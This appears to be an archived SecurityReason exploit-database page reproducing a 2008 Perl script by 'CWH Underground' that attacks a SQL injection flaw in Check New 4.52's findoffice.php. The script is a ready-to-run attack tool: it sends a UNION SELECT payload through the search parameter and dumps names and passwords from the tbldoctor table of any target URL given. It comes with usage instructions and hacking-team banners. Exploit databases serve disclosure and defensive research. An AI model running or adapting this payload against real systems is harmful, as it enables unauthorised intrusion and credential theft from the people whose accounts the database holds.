|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 5232 Milw0rm ID : 7328 Credit : CWH Date : 4.12.2008 Exploit Code : #!/usr/bin/perl -w #===================================================================== # Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit #===================================================================== # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 3 December 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : Check Up New Generation #VERSION : 4.52 #VENDOR : http://checkup.sourceforge.net/ #DOWNLOAD : http://downloads.sourceforge.net/checkup/checknew_4.52.zip ###################################################### # #Note: magic_quotes_gpc = off # ########################################################################### ############ #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK ########################################################################### ############ use LWP::UserAgent; use HTTP::Request; my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } if ($#ARGV+1 != 2) { print "\n==============================================\n"; print " Check New Remote SQL Injection Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n"; print " \n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; print " \n"; print "Usage : ./xpl.pl <URL to PATH> <Dump Limit>\n"; print "Example: ./xpl.pl http://www.target.com/checknew 10\n"; exit(); } $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $number = $ARGV[1]; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; print "\n ..:: SQL Injection Exploit By CWH Underground ::.. "; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print "\n[+]Dump Username and Password\n"; for ($start=0;$start<$number;$start++) { $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201, concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n"; $res = $xpl->request($req); $info = $res->content; $count=$start+1; if ($info =~ /:::(.+):::/) { $dump=$1; ($username,$password)= split('::',$dump); printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; } else { print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; exit; } } |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |